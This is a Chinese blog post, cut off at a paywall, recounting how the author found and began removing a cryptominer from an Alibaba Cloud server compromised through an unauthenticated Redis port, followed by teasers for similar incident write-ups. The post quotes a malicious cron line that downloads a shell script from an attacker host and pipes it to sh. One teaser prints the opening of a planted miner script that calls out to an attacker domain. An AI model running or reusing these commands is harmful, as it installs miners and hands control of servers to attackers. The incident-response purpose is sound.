阿里云服务器遭受挖矿程序的入侵的清理之战

最新推荐文章于 2024-10-01 10:44:30 发布
置顶 最新推荐文章于 2024-10-01 10:44:30 发布
阅读量2.8k 收藏 5
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 安全防护 文章标签: 安全防护
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38685242/article/details/97390088
本文详细记录了在阿里云服务器上遭遇挖矿程序攻击后的排查和清理过程,包括关闭入侵入口、清除隐身进程和定时任务,以及恢复系统安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. 背景

最近在阿里云服务器上安装了缓存redis,由于没有设置密码,并且开放了6379端口,遭受了挖矿程序攻击。操作系统为centos7。

2. 排查

(1)使用top命令,cpu使用率很少,几乎为0,该图只是演示,不是当时情况,当时情况:cpu使用率为0,空闲100%,明显很有问题
在这里插入图片描述
这个时候,说明挖矿程序改变你的服务器,看到的并不真实,这个时候需要一个命令:vmstat
在这里插入图片描述
你会发现us为99 id几乎为0

(2)查看Linux的定时任务cron,使用命令crontab -l 命令查看所有的定时任务,如果没有设置定时执行脚本的计划,发现多了一个任务计划:

*/10 * * * * root (/usr/local/sbin/sshd||curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh

看到这任务计划,明显不是自己设置的
再使用crontab -e编辑,也发现了这个执行计划,这时候你试图删除它,我没那么幸运,我删除不掉它。删除还是会出现。想想都很可恶。而这个可恶的程序地址就是看到的 lsd.systemten.org,用浏览器打开它就是shell脚本。

最低0.47元/天 解锁文章

200万优质内容无限畅学
记一次阿里云服务器CPU长期100%发现被被种挖矿程序解决的过程(挖矿入侵应急响应)
墨痕诉清风的博客
11-18 2727
记一次阿里云服务器被被种挖矿程序解决的过程。
Ubuntu | ERROR: ld.so: object ‘/usr/lib64/libthread.so.1‘ from /etc/ld.so.preload cannot be preloade
我是一块小石头
02-07 4018
错误一览 ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. root@xxx:~# root@xxx:~# ls ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be prel
阿里云服务器挖矿程序侵入问题
samfaker的博客
08-23 1574
gitlab漏洞引起的无文件、无定时任务的挖矿程序解决方法
阿里云服务器挖矿程序攻击
戴着红领巾走世界
02-08 1008
删除恶意脚本文件,直接rm删除不了,需要修改下文件的属性 cd /etc/ rm -f newinit.sh #查看文件属性 lsattr newinit.sh #修改文件属性 chattr -ia newinit.sh 查看定时任务中是否有任务,如果有就删除了此定时任务 * /30 * * * * sh /etc/newinit.sh >/dev/null 2>&1 直接用crontab -e删除没有权限 ...
阿里云服务器存在恶意挖矿程序
u014203449的博客
03-01 5812
阿里云发了很多短信。 进入服务器,发现速度缓慢。 输入 top命令查看cpu利用率,发现被占满。networkservice , sysupdate这两个程序。 netstat -anop 也能查询到很多 networkservice的程序用tcp在运行, 首先kill掉上述进程,但是没有卵用,还是很卡,top命令发现这些程序又启动了。 可以在 /proc/[...
阿里云服务器遭到挖矿攻击的问题
ahoges的博客
04-24 1066
这两天发现老是被攻击,阿里云提示遭到挖矿程序攻击,我一个top,一看都飙到99%了(阿里云服务器牛逼),网上给的一些解决方案都不行,然后我发现我的docker上面凭空多了一个到两个ubuntu容器,容器和镜像的创建时间是被修改过的,一开始都没注意到,把容器停止,删掉镜像,挖矿程序果然就不见了。 ...
阿里云服务器中了挖矿程序应该如何清除
m0_65455195的博客
12-17 6042
阿里云服务器中了挖矿程序如何处理?云安全中心安全告警短信提醒云服务器中了挖矿程序怎么处理?护云盾来详细说下阿里云服务器挖矿程序的解决方法,一种是使用云安全中心自动处理,另一种方式是自行手动清除。 阿里云服务器挖矿程序解决方法 如果你的阿里云服务器中了挖矿程序,你有两种处理方式,一种是使用云安全中心自动清理,另一种是手动清除: 云安全中心处理挖矿程序 1、登录到云安全中心控制台 2、左侧栏,选择“威胁检测”--“安全告警处理” 在安全告警处理列表中,找到挖矿程序,然后点“处理” 云安全中心安
张大哥笔记:服务器有挖矿木马程序,该如何处理?
qq1369153265的博客
04-29 1059
挖矿是跟区块链以及虚拟币有关系,虚拟币是挖矿挖出来的,每间隔一段时间,比特币或者以太坊虚拟币就会在他们的区块链系统上生成一个块的随机代码,网络上的所有服务器都可以去找这个随机代码,也就是挖矿的过程对这个随机代码进行挖掘,谁挖到这个代码就会产生一个区块链的块,那么比特币跟以太坊就会奖励找到随机代码的人,奖励一定数量的虚拟币,那么挖矿的人就会有动力去挖矿,去维护整个区块链节点的网络正常运行,挖矿需要计算哈希值需要服务器的处理能力,所以有些攻击者利用入侵别人服务器来给自己挖矿获取利润。
阿里云服务器被[crypto]攻击导致CPU爆满(已解决)
大鹏
07-14 1854
缘由 之前玩Docker并开放了2375端口和redis 弱密码 且默认6379端口 的时候,安装时未使用密码,然后还在阿里云开放了0.0.0.0的6379端口,导致出现了漏洞, 现象 被安装了Docker镜像且启用了容器运行。 Reids多了几条任务计划的缓存数据 /usr/share 目录下多了 5个文件 -rwxr-xr-x 1 root root 4563624 Jul 1 17:46 '[crypto]' -rw-r--r-- 1 root root 4384...
阿里云ECS服务器被攻击,植入挖矿程序的处理历程(您的云服务器由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:22)的访问)、ssh远程端口的修改
最新发布
m0_64422133的博客
10-01 1962
您的云服务器(xxx.xxx.x.xx)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:22)的访问,阻断预计将在2024-10-02 05:39:24时间内结束,请及时进行安全自查。
处理阿里云服务器中的恶意挖矿程序
weixin_43268590的博客
06-24 1266
恶意挖矿程序会在未经用户许可的情况下在用户的设备上运行,占用大量计算资源进行挖矿,这可能会导致设备性能下降、温度升高、甚至硬件损伤。因此,用户应当做到以下措施来尽可能地预防挖矿: 及时更新系统和应用程序的安全补丁; 安装安全软件; 加强用户权限管理; 提升防火墙的安全级别,关闭不需要的服务端口; 监控服务器日志等。
阿里云ECS遭挖矿程序攻击解决方法
weixinhmz的博客
08-21 358
阿里云ECS遭挖矿程序攻击解决方法
阿里云服务器挖矿程序minerd入侵的终极解决办法
danson_yang的专栏
12-19 2563
突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下:  3798 root      20   0  386m 7852 1272 S 300.0  0.1   4355:11 /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM...
阿里云——云安全中心安全事件提醒:挖矿程序
iamcool345的博客
05-22 6040
近日收到云安全中心安全事件提醒,“出现了紧急安全事件:挖矿程序,建议您立即登录查看事件详情,并根据事件建议的方案进行处理。” 登录服务器后用top命令查看CPU利用率并不高,感觉不一定真是挖矿程序在作怪,或挖矿还没启动。用ps -ef命令列出进程,发现一个名为“httpdz”的可疑进程,杀死进程后,这个httpdz又立即启动。 查阅/etc/crontab、/etc/cron.d和/var/s...
阿里云服务器入侵执行MoneroOcean(门罗币)挖矿脚本
热门推荐
weixin_54071027的博客
06-26 1万+
为学习使用Redis,在阿里云Linux服务器上安装了redis并且后台运行,开放了默认端口,而且没有设置访问密码,当天晚上被执行了恶意脚本。 恶意代码如下,分享一下: #!/bin/bash us=$(id) curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null ulimit -n 65535 export MOHOME=/usr/share mkdir $MOHOME -p if [ -f "$MOHOME/[
阿里云服务器挖矿病毒解决办法(已实践)
qq_49182770的博客
02-13 9177
1、cpu过高,中病毒了 2、进入Linux连接阿里云服务器 3、使用top命令动态查看cpu占用率 两种情况 1、未发现占用率很高的进程,跳到第七步 2、发现了占用率很高的进程,使用kill -9 pid 杀死进程会发现病毒继续出现,没用,跳到第四步 4、查看病毒文件地址 输入 ls -l /proc/{病毒PID}/exe 查看病毒路径 5、进入病毒文件,将其统统删除 6、kill 杀死进程,完成,再次查看cpu,无病毒进程搞定 7、如果阿里云服务器中显示c.
阿里云服务器挖矿木马处理过程
小灵通的专栏
01-18 1万+
在阿里云租用一台服务器,最近发现被异地登陆,紧接着出现异常下载。登陆服务器,发现CPU达100%,并且安骑士提示有挖矿进程。因为对linux系统不是很熟悉,故而边找资料边处理实验,最后记录下来以便日后处理备查。首先登陆服务器,使用top命令查看进程:CPU飙到100%,按CPU消耗排序,排在第一的是一个名为“imWBR1”的进程,查了一下是一个挖矿木马,首先比较直观的是imWBR1这个进程,查找它
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值